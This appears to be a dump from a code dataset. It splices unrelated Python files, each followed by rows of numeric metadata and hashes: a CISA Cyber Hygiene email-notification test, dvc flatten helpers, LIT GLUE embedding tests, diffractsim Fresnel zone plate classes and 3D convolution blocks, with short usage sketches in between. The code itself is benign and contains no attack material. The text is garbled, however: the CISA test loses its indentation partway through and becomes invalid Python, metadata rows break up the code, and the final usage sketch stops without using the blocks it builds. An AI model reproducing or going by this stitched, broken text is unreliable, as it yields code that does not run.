<p>WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid “need-to-know” without prior approval of an authorized DHS official.</p>
</body>
</html>
"""
                self.assertEqual(part.get_payload(), html_body)
    def test_four_params_multiple_recipients_nonfed(self):
        """Test the 4-parameter non-Federal version of the constructor."""
        to = ["recipient@example.com", "recipient2@example.com"]
        pdf = "./tests/data/pdf-sample.pdf"
        agency_acronym = "NONFEDTEST"
        is_federal = False
        report_date = "December 15, 2001"
        message = CyhyNotificationMessage(
            to, pdf, agency_acronym, is_federal, report_date
        )
        self.assertEqual(message["From"], "reports@cyber.dhs.gov")
        self.assertEqual(
            message["Subject"],
            "NONFEDTEST - Cyber Hygiene Alert - December 15, 2001",
        )
        self.assertEqual(message.get("CC"), None)
        self.assertEqual(message["BCC"], "cyhy_reports@hq.dhs.gov")
        self.assertEqual(message["To"], "recipient@example.com,recipient2@example.com")
        # Grab the bytes that comprise the attachment
        bytes = open(pdf, "rb").read()
        # Make sure the correct body and PDF attachments were added
        for part in message.walk():
            # multipart/* are just containers
            if part.get_content_type() == "application/pdf":
                self.assertEqual(part.get_payload(decode=True), bytes)
                self.assertEqual(part.get_filename(), "pdf-sample.pdf")
            elif part.get_content_type() == "text/plain":
                body = """Greetings NONFEDTEST,
Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
* New critical and/or high vulnerabilities
* New potentially risky services
CISA recommends remediating critical findings within 15 days and high findings within 30 days.
CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.
The details are in the attached PDF, which has the same password as your Cyber Hygiene report.
If you have any questions, please contact our office.
Cheers,
CISA Cyber Assessments - Cyber Hygiene
Cybersecurity and Infrastructure Security Agency
vulnerability@cisa.dhs.gov
WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid "need-to-know" without prior approval of an authorized DHS official.
"""
                self.assertEqual(part.get_payload(), body)
            elif part.get_content_type() == "text/html":
                html_body = """<html>
<head></head>
<body>
<p>Greetings NONFEDTEST,</p>
<p>Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
<ul>
<li>New critical and/or high vulnerabilities</li>
<li>New potentially risky services</li>
</ul>
</p>
<p>CISA recommends remediating critical findings within 15 days and high findings within 30 days.</p>
<p>CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.</p>
<p>The details are in the attached PDF, which has the same password as your Cyber Hygiene report.</p>
<p>If you have any questions, please contact our office.</p>
<p>Cheers,<br>
CISA Cyber Assessments - Cyber Hygiene<br>
Cybersecurity and Infrastructure Security Agency<br>
<a href="mailto:vulnerability@cisa.dhs.gov">vulnerability@cisa.dhs.gov</a></p>
<p>WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid “need-to-know” without prior approval of an authorized DHS official.</p>
</body>
</html>
"""
self.assertEqual(part.get_payload(), html_body)
def test_six_params_single_cc_nonfed(self):
"""Test the 6-parameter non-Federal version of the constructor."""
to = ["recipient@example.com", "recipient2@example.com"]
pdf = "./tests/data/pdf-sample.pdf"
fm = "sender@example.com"
cc = ["cc@example.com"]
bcc = ["bcc@example.com"]
agency_acronym = "NONFEDTEST"
is_federal = False
report_date = "December 15, 2001"
message = CyhyNotificationMessage(
to,
pdf,
agency_acronym,
is_federal,
report_date,
from_addr=fm,
cc_addrs=cc,
bcc_addrs=bcc,
)
self.assertEqual(message["From"], fm)
self.assertEqual(
message["Subject"],
"NONFEDTEST - Cyber Hygiene Alert - December 15, 2001",
)
self.assertEqual(message["CC"], "cc@example.com")
self.assertEqual(message["BCC"], "bcc@example.com")
self.assertEqual(message["To"], "recipient@example.com,recipient2@example.com")
# Grab the bytes that comprise the attachment
bytes = open(pdf, "rb").read()
# Make sure the correct body and PDF attachments were added
for part in message.walk():
# multipart/* are just containers
if part.get_content_type() == "application/pdf":
self.assertEqual(part.get_payload(decode=True), bytes)
self.assertEqual(part.get_filename(), "pdf-sample.pdf")
elif part.get_content_type() == "text/plain":
body = """Greetings NONFEDTEST,
Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
* New critical and/or high vulnerabilities
* New potentially risky services
CISA recommends remediating critical findings within 15 days and high findings within 30 days.
CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.
The details are in the attached PDF, which has the same password as your Cyber Hygiene report.
If you have any questions, please contact our office.
Cheers,
CISA Cyber Assessments - Cyber Hygiene
Cybersecurity and Infrastructure Security Agency
vulnerability@cisa.dhs.gov
WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid "need-to-know" without prior approval of an authorized DHS official.
"""
self.assertEqual(part.get_payload(), body)
elif part.get_content_type() == "text/html":
html_body = """<html>
<head></head>
<body>
<p>Greetings NONFEDTEST,</p>
<p>Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
<ul>
<li>New critical and/or high vulnerabilities</li>
<li>New potentially risky services</li>
</ul>
</p>
<p>CISA recommends remediating critical findings within 15 days and high findings within 30 days.</p>
<p>CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.</p>
<p>The details are in the attached PDF, which has the same password as your Cyber Hygiene report.</p>
<p>If you have any questions, please contact our office.</p>
<p>Cheers,<br>
CISA Cyber Assessments - Cyber Hygiene<br>
Cybersecurity and Infrastructure Security Agency<br>
<a href="mailto:vulnerability@cisa.dhs.gov">vulnerability@cisa.dhs.gov</a></p>
<p>WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid “need-to-know” without prior approval of an authorized DHS official.</p>
</body>
</html>
"""
self.assertEqual(part.get_payload(), html_body)
def test_six_params_multiple_cc_nonfed(self):
"""Test the 6-parameter non-Federal version of the constructor."""
to = ["recipient@example.com", "recipient2@example.com"]
pdf = "./tests/data/pdf-sample.pdf"
fm = "sender@example.com"
cc = ["cc@example.com", "cc2@example.com"]
bcc = ["bcc@example.com", "bcc2@example.com"]
agency_acronym = "NONFEDTEST"
is_federal = False
report_date = "December 15, 2001"
message = CyhyNotificationMessage(
to,
pdf,
agency_acronym,
is_federal,
report_date,
from_addr=fm,
cc_addrs=cc,
bcc_addrs=bcc,
)
self.assertEqual(message["From"], fm)
self.assertEqual(
message["Subject"],
"NONFEDTEST - Cyber Hygiene Alert - December 15, 2001",
)
self.assertEqual(message["CC"], "cc@example.com,cc2@example.com")
self.assertEqual(message["BCC"], "bcc@example.com,bcc2@example.com")
self.assertEqual(message["To"], "recipient@example.com,recipient2@example.com")
# Grab the bytes that comprise the attachment
bytes = open(pdf, "rb").read()
# Make sure the correct body and PDF attachments were added
for part in message.walk():
# multipart/* are just containers
if part.get_content_type() == "application/pdf":
self.assertEqual(part.get_payload(decode=True), bytes)
self.assertEqual(part.get_filename(), "pdf-sample.pdf")
elif part.get_content_type() == "text/plain":
body = """Greetings NONFEDTEST,
Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
* New critical and/or high vulnerabilities
* New potentially risky services
CISA recommends remediating critical findings within 15 days and high findings within 30 days.
CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.
The details are in the attached PDF, which has the same password as your Cyber Hygiene report.
If you have any questions, please contact our office.
Cheers,
CISA Cyber Assessments - Cyber Hygiene
Cybersecurity and Infrastructure Security Agency
vulnerability@cisa.dhs.gov
WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid "need-to-know" without prior approval of an authorized DHS official.
"""
self.assertEqual(part.get_payload(), body)
elif part.get_content_type() == "text/html":
html_body = """<html>
<head></head>
<body>
<p>Greetings NONFEDTEST,</p>
<p>Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
<ul>
<li>New critical and/or high vulnerabilities</li>
<li>New potentially risky services</li>
</ul>
</p>
<p>CISA recommends remediating critical findings within 15 days and high findings within 30 days.</p>
<p>CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.</p>
<p>The details are in the attached PDF, which has the same password as your Cyber Hygiene report.</p>
<p>If you have any questions, please contact our office.</p>
<p>Cheers,<br>
CISA Cyber Assessments - Cyber Hygiene<br>
Cybersecurity and Infrastructure Security Agency<br>
<a href="mailto:vulnerability@cisa.dhs.gov">vulnerability@cisa.dhs.gov</a></p>
<p>WARNING: This message and any attached document(s) is FOR OFFICIAL USE ONLY (FOUO). It contains information that may be exempt from public release under the Freedom of Information Act (5 U.S.G. 552). It is to be controlled, stored, handled, transmitted, distributed, and disposed of in accordance with DHS policy relating to FOUO information and is not to be released to the public or other personnel who do not have a valid “need-to-know” without prior approval of an authorized DHS official.</p>
</body>
</html>
"""
self.assertEqual(part.get_payload(), html_body)
if __name__ == "__main__":
unittest.main()
| 51.677989 | 512 | 0.707611 | 5,493 | 38,035 | 4.861096 | 0.044056 | 0.040446 | 0.032956 | 0.026365 | 0.993109 | 0.993109 | 0.988203 | 0.988203 | 0.988203 | 0.988203 | 0 | 0.009896 | 0.202945 | 38,035 | 735 | 513 | 51.748299 | 0.870893 | 0.04488 | 0 | 0.942699 | 0 | 0.133087 | 0.729836 | 0.058976 | 0 | 0 | 0 | 0 | 0.133087 | 1 | 0.014787 | false | 0.029575 | 0.003697 | 0 | 0.020333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
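A hedged usage sketch for the constructor exercised by the tests above; it relies only on the argument order and keyword names those tests use. The import path is an assumption and is therefore left commented out.

# Sketch only. The import path below is assumed from the package under test and
# may differ; adjust it to match the test module's own import.
# from cyhy.mailer.CyhyNotificationMessage import CyhyNotificationMessage

def build_nonfederal_notification(pdf_path):
    """Build a non-Federal notification the same way the tests above do."""
    message = CyhyNotificationMessage(
        ["recipient@example.com"],   # to
        pdf_path,                    # path to the PDF attachment
        "NONFEDTEST",                # agency acronym
        False,                       # is_federal
        "December 15, 2001",         # report date
        from_addr="sender@example.com",
        cc_addrs=["cc@example.com"],
        bcc_addrs=["bcc@example.com"],
    )
    # The message exposes standard email headers and MIME parts, exactly as the
    # assertions above rely on.
    for part in message.walk():
        print(part.get_content_type(), part.get_filename())
    return message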
0d501eefe3ce134fe25493327643330889e3892b | 189 | py | Python | dvc/utils/flatten.py | lucasalavapena/dvc | 230eb7087df7f063ded7422af7ae45bd04eb794a | [
"Apache-2.0"
] | 9,136 | 2018-05-30T05:10:44.000Z | 2022-03-31T16:58:52.000Z | dvc/utils/flatten.py | 4nalog/dvc | 13c1314099df131f526177b2a75bda02dfc0cdbf | [
"Apache-2.0"
] | 4,804 | 2018-05-30T00:36:42.000Z | 2022-03-31T18:34:54.000Z | dvc/utils/flatten.py | 4nalog/dvc | 13c1314099df131f526177b2a75bda02dfc0cdbf | [
"Apache-2.0"
] | 1,072 | 2018-05-30T07:59:35.000Z | 2022-03-28T20:43:49.000Z | def flatten(d):
import flatten_dict
return flatten_dict.flatten(d, reducer="dot")
def unflatten(d):
import flatten_dict
return flatten_dict.unflatten(d, splitter="dot")
| 17.181818 | 52 | 0.714286 | 26 | 189 | 5.038462 | 0.384615 | 0.335878 | 0.21374 | 0.274809 | 0.534351 | 0.534351 | 0.534351 | 0 | 0 | 0 | 0 | 0 | 0.179894 | 189 | 10 | 53 | 18.9 | 0.845161 | 0 | 0 | 0.333333 | 0 | 0 | 0.031746 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
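A minimal usage sketch for the flatten/unflatten helpers above, assuming the third-party flatten_dict package is installed; the example dictionary is illustrative.

# Illustrative round trip through the helpers defined above.
nested = {"train": {"lr": 0.01, "epochs": 10}, "seed": 42}

flat = flatten(nested)
# With reducer="dot", nested keys are joined with '.':
# {"train.lr": 0.01, "train.epochs": 10, "seed": 42}

restored = unflatten(flat)
assert restored == nested  # splitter="dot" reverses the transformation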
b4e8bec0f85ca78a79d80de607eee0f6602a21f9 | 79 | py | Python | region/api.py | Dexterzhao/region | 596476ad291bfbbeb7d88bb70503aff89c1df59c | [
"BSD-3-Clause"
] | 15 | 2018-05-17T07:17:43.000Z | 2022-02-20T19:00:58.000Z | region/api.py | Dexterzhao/region | 596476ad291bfbbeb7d88bb70503aff89c1df59c | [
"BSD-3-Clause"
] | 29 | 2017-09-23T20:46:26.000Z | 2019-12-18T20:16:56.000Z | region/api.py | Dexterzhao/region | 596476ad291bfbbeb7d88bb70503aff89c1df59c | [
"BSD-3-Clause"
] | 17 | 2017-06-23T17:37:44.000Z | 2020-04-15T16:45:35.000Z | from .max_p_regions import api as maxp
from .p_regions import api as p_regions
| 26.333333 | 39 | 0.822785 | 16 | 79 | 3.8125 | 0.5 | 0.393443 | 0.459016 | 0.557377 | 0.622951 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151899 | 79 | 2 | 40 | 39.5 | 0.910448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
b4e9604f2cacda1cd40451bb5e8757ad8146f43d | 4,845 | py | Python | lit_nlp/examples/models/glue_models_test.py | eichinflo/lit | b46c0cac34baa571242637b53b78cfd69de536d0 | [
"Apache-2.0"
] | 2,854 | 2020-08-12T15:51:12.000Z | 2022-03-31T08:24:13.000Z | lit_nlp/examples/models/glue_models_test.py | soma2000-lang/lit | b46c0cac34baa571242637b53b78cfd69de536d0 | [
"Apache-2.0"
] | 156 | 2020-08-16T21:09:05.000Z | 2022-03-30T18:04:53.000Z | lit_nlp/examples/models/glue_models_test.py | soma2000-lang/lit | b46c0cac34baa571242637b53b78cfd69de536d0 | [
"Apache-2.0"
] | 301 | 2020-08-14T05:52:56.000Z | 2022-03-25T22:48:01.000Z | """Tests for lit_nlp.examples.models.glue_models."""
from absl.testing import absltest
from lit_nlp.examples.models import glue_models
import numpy as np
class GlueModelForTesting(glue_models.GlueModel):
"""Glue model for testing, which skips Huggingface initializations."""
def _load_model(self, model_name_or_path):
pass
class GlueModelsTest(absltest.TestCase):
def test_scatter_all_embeddings_single_input(self):
glue_model = GlueModelForTesting(
model_name_or_path="bert-base-uncased",
text_a_name="sentence1")
emb_size = 10
# We'll inject zeros for the embeddings of 'hi',
# while special tokens get vectors of 1s.
embs_a = np.zeros((1, emb_size))
input_embs = np.ones((1, 3, emb_size))
# Scatter embs_a into input_embs
result = glue_model.scatter_all_embeddings([{"sentence1": "hi",
"input_embs_sentence1": embs_a,
}], input_embs)
target = [[[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1]]]
np.testing.assert_almost_equal(result, target)
def test_scatter_all_embeddings_both_inputs(self):
glue_model = GlueModelForTesting(
model_name_or_path="bert-base-uncased",
text_a_name="sentence1",
text_b_name="sentence2")
emb_size = 10
# Inject zeros at positions corresponding to real tokens
# in each segment. Special tokens get vectors of 1s.
embs_a = np.zeros((1, emb_size))
embs_b = np.zeros((3, emb_size))
input_embs = np.ones((1, 7, emb_size))
# Scatter embs_a and embs_b into input_embs
result = glue_model.scatter_all_embeddings([{"sentence1": "hi",
"input_embs_sentence1": embs_a,
"sentence2": "how are you",
"input_embs_sentence2": embs_b
}], input_embs)
target = [[[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1]]]
np.testing.assert_almost_equal(result, target)
def test_scatter_all_embeddings_multi_batch(self):
glue_model = GlueModelForTesting(
model_name_or_path="bert-base-uncased",
text_a_name="sentence1")
emb_size = 4
embs_a = np.zeros((1, emb_size))
embs_b = np.zeros((2, emb_size))
input_embs = np.ones((2, 4, emb_size))
# Scatter embs_a and embs_b into input_embs
result = glue_model.scatter_all_embeddings([{"sentence1": "hi",
"input_embs_sentence1": embs_a,
},
{"sentence1": "hi there",
"input_embs_sentence1": embs_b,
}], input_embs)
target = [[[1, 1, 1, 1],
[0, 0, 0, 0],
[1, 1, 1, 1],
[1, 1, 1, 1]],
[[1, 1, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0],
[1, 1, 1, 1]]]
np.testing.assert_almost_equal(result, target)
# Scatter only embs_a into input_embs
result = glue_model.scatter_all_embeddings([{"sentence1": "hi",
"input_embs_sentence1": embs_a,
},
{"sentence1": "hi there"
}], input_embs)
target = [[[1, 1, 1, 1],
[0, 0, 0, 0],
[1, 1, 1, 1],
[1, 1, 1, 1]],
[[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1]]]
np.testing.assert_almost_equal(result, target)
# Scatter only embs_b into input_embs
result = glue_model.scatter_all_embeddings([{"sentence1": "hi"},
{"sentence1": "hi there",
"input_embs_sentence1": embs_b,
}], input_embs)
target = [[[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1]],
[[1, 1, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0],
[1, 1, 1, 1]]]
np.testing.assert_almost_equal(result, target)
if __name__ == "__main__":
absltest.main()
| 40.041322 | 80 | 0.461507 | 599 | 4,845 | 3.507513 | 0.160267 | 0.104712 | 0.139933 | 0.163732 | 0.754879 | 0.735364 | 0.724893 | 0.70633 | 0.70633 | 0.70633 | 0 | 0.082048 | 0.411352 | 4,845 | 120 | 81 | 40.375 | 0.654628 | 0.101548 | 0 | 0.715789 | 0 | 0 | 0.083295 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 1 | 0.042105 | false | 0.010526 | 0.031579 | 0 | 0.094737 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
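A standalone NumPy sketch of the scatter pattern these tests verify: per-token embeddings for a segment's real tokens are written into a template of ones, while the special-token positions keep their original values. It is a simplified illustration of that behavior, not the LIT implementation.

import numpy as np

def scatter_tokens_into_template(token_embs, template, start=1):
    """Copy token embeddings into a (seq_len, emb_size) template of ones.

    Positions [start, start + n_tokens) are overwritten; index 0 and the
    trailing positions (e.g. [CLS]/[SEP]) keep their original values,
    mirroring the targets asserted in the tests above.
    """
    out = template.copy()
    n = token_embs.shape[0]
    out[start:start + n] = token_embs
    return out

emb_size = 4
template = np.ones((4, emb_size))      # [CLS], one real token, [SEP], one extra slot
token_embs = np.zeros((1, emb_size))   # embeddings for a single token, e.g. "hi"
result = scatter_tokens_into_template(token_embs, template)
# Row 1 is now zeros while rows 0, 2, and 3 remain ones, matching the
# single-token target in test_scatter_all_embeddings_multi_batch.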
3706d9a147c7efb0f1f4adf8064c640a42be33e0 | 1,539 | py | Python | diffractsim/diffractive_elements/fresnel_zone_plate.py | rafael-fuente/diffractsim | 7287635d2bfa76f8b1eb24c6208796f761dd6144 | [
"BSD-3-Clause"
] | 29 | 2022-01-01T01:16:29.000Z | 2022-03-31T00:42:52.000Z | diffractsim/diffractive_elements/fresnel_zone_plate.py | rafael-fuente/diffractsim | 7287635d2bfa76f8b1eb24c6208796f761dd6144 | [
"BSD-3-Clause"
] | 2 | 2022-01-02T17:33:00.000Z | 2022-01-03T17:51:39.000Z | diffractsim/diffractive_elements/fresnel_zone_plate.py | rafael-fuente/diffractsim | 7287635d2bfa76f8b1eb24c6208796f761dd6144 | [
"BSD-3-Clause"
] | 6 | 2022-02-07T22:44:42.000Z | 2022-03-23T12:34:54.000Z | import numpy as np
from ..util.backend_functions import backend as bd
from .diffractive_element import DOE
class BinaryFZP(DOE):
def __init__(self, f, λ, radius = None, aberration = None):
"""
Creates a Phase Binary Fresnel Zone Plate with a focal length equal to f for a wavelength λ
"""
global bd
from ..util.backend_functions import backend as bd
self.f = f
self.FZP_λ = λ
self.radius = radius
def get_transmittance(self, xx, yy, λ):
t = 1
if self.radius is not None:
t = bd.where((xx**2 + yy**2) < self.radius**2, t, bd.zeros_like(xx))
r_2 = xx**2 + yy**2
phase_shift = bd.pi* (bd.sign(((2*bd.pi/self.FZP_λ * (bd.sqrt(self.f**2 + r_2) - self.f))) % (2*bd.pi) - bd.pi ))/2.
t = t*bd.exp(1j*phase_shift)
return t
class FZP(DOE):
def __init__(self, f, λ, radius = None, aberration = None):
"""
Creates a Phase Blazed (Ideal) Fresnel Zone Plate with a focal length equal to f for a wavelength λ
"""
global bd
from ..util.backend_functions import backend as bd
self.f = f
self.FZP_λ = λ
self.radius = radius
def get_transmittance(self, xx, yy, λ):
t = 1
if self.radius is not None:
t = bd.where((xx**2 + yy**2) < self.radius**2, t, bd.zeros_like(xx))
r_2 = xx**2 + yy**2
phase_shift = -(2*bd.pi/λ * (bd.sqrt(self.f**2 + r_2) - self.f))
t = t*bd.exp(1j*phase_shift)
return t
| 27.482143 | 118 | 0.556205 | 244 | 1,539 | 3.397541 | 0.241803 | 0.036188 | 0.024125 | 0.028951 | 0.814234 | 0.814234 | 0.814234 | 0.814234 | 0.764777 | 0.702051 | 0 | 0.022727 | 0.31384 | 1,539 | 55 | 119 | 27.981818 | 0.762311 | 0.124107 | 0 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121212 | false | 0 | 0.151515 | 0 | 0.393939 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
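A standalone NumPy sketch of the binary phase profile computed in BinaryFZP.get_transmittance above: the ideal-lens phase 2*pi/lambda * (sqrt(f**2 + r**2) - f) is wrapped to [0, 2*pi) and thresholded at pi, producing a two-level plate whose phase levels differ by pi. The wavelength, focal length, and grid values are illustrative.

import numpy as np

wavelength = 632.8e-9      # illustrative design wavelength (m)
focal_length = 0.5         # illustrative focal length (m)

# Illustrative sampling grid
x = np.linspace(-5e-3, 5e-3, 501)
xx, yy = np.meshgrid(x, x)
r2 = xx**2 + yy**2

# Ideal-lens phase needed to focus at focal_length
lens_phase = 2 * np.pi / wavelength * (np.sqrt(focal_length**2 + r2) - focal_length)

# Binarize: zones where the wrapped phase exceeds pi get +pi/2, the rest -pi/2,
# i.e. a two-level plate with a pi phase step, as in BinaryFZP above.
binary_phase = np.pi * np.sign(lens_phase % (2 * np.pi) - np.pi) / 2
transmittance = np.exp(1j * binary_phase)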
2eba4bdc69f90d559c48e1af4ef9affe05f3e336 | 45 | py | Python | src/models/__init__.py | andriihomiak/literate-enigma | 179a52432a0c9b67e916c5c9157e8f3051a20619 | [
"MIT"
] | null | null | null | src/models/__init__.py | andriihomiak/literate-enigma | 179a52432a0c9b67e916c5c9157e8f3051a20619 | [
"MIT"
] | null | null | null | src/models/__init__.py | andriihomiak/literate-enigma | 179a52432a0c9b67e916c5c9157e8f3051a20619 | [
"MIT"
] | null | null | null | from .classification import ClassificationNet | 45 | 45 | 0.911111 | 4 | 45 | 10.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 45 | 1 | 45 | 45 | 0.97619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2edd530ef6e56e4b94e5d9e4b2c7ca1933139845 | 1,329 | py | Python | lowres/model/lowres/structural_blocks.py | mdpi2020lowres/mdpi2020lowres | 1a73ab011063998e57a31db13b170d604f71a794 | [
"Apache-2.0"
] | null | null | null | lowres/model/lowres/structural_blocks.py | mdpi2020lowres/mdpi2020lowres | 1a73ab011063998e57a31db13b170d604f71a794 | [
"Apache-2.0"
] | null | null | null | lowres/model/lowres/structural_blocks.py | mdpi2020lowres/mdpi2020lowres | 1a73ab011063998e57a31db13b170d604f71a794 | [
"Apache-2.0"
] | null | null | null | import torch.nn as nn
class PreActivation3dNoBN(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, padding=1, bias=True):
super().__init__()
self.conv = nn.Conv3d(in_channels, out_channels, kernel_size=kernel_size, padding=padding, bias=bias)
self.activation = nn.ReLU(inplace=True)
def forward(self, x):
return self.conv(self.activation(x))
class PostActivation3dNoBN(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, padding=1, bias=True):
super().__init__()
self.conv = nn.Conv3d(in_channels, out_channels, kernel_size=kernel_size, padding=padding, bias=bias)
self.activation = nn.ReLU(inplace=True)
def forward(self, x):
return self.activation(self.conv(x))
class ResBlock3dNoBN(nn.Module):
def __init__(self, n_channels, kernel_size=3, padding=1, bias=True):
super().__init__()
self.path = nn.Sequential(
nn.Conv3d(n_channels, n_channels, kernel_size=kernel_size, padding=padding, bias=bias),
nn.ReLU(inplace=True),
nn.Conv3d(n_channels, n_channels, kernel_size=kernel_size, padding=padding, bias=bias),
nn.ReLU(inplace=True),
)
def forward(self, x):
x_path = self.path(x)
return x + x_path
| 33.225 | 109 | 0.669676 | 180 | 1,329 | 4.666667 | 0.188889 | 0.130952 | 0.15 | 0.1 | 0.802381 | 0.779762 | 0.779762 | 0.779762 | 0.761905 | 0.761905 | 0 | 0.012357 | 0.208427 | 1,329 | 39 | 110 | 34.076923 | 0.786122 | 0 | 0 | 0.592593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.037037 | 0.074074 | 0.481481 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
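A brief shape check for the blocks defined above, assuming they are importable from this module; spatial dimensions are preserved because every Conv3d uses kernel_size=3 with padding=1.

import torch

# Assumes the classes above are in scope (e.g. imported from this module).
block = ResBlock3dNoBN(n_channels=8)
pre = PreActivation3dNoBN(in_channels=8, out_channels=16)

x = torch.randn(2, 8, 12, 12, 12)            # (batch, channels, depth, height, width)
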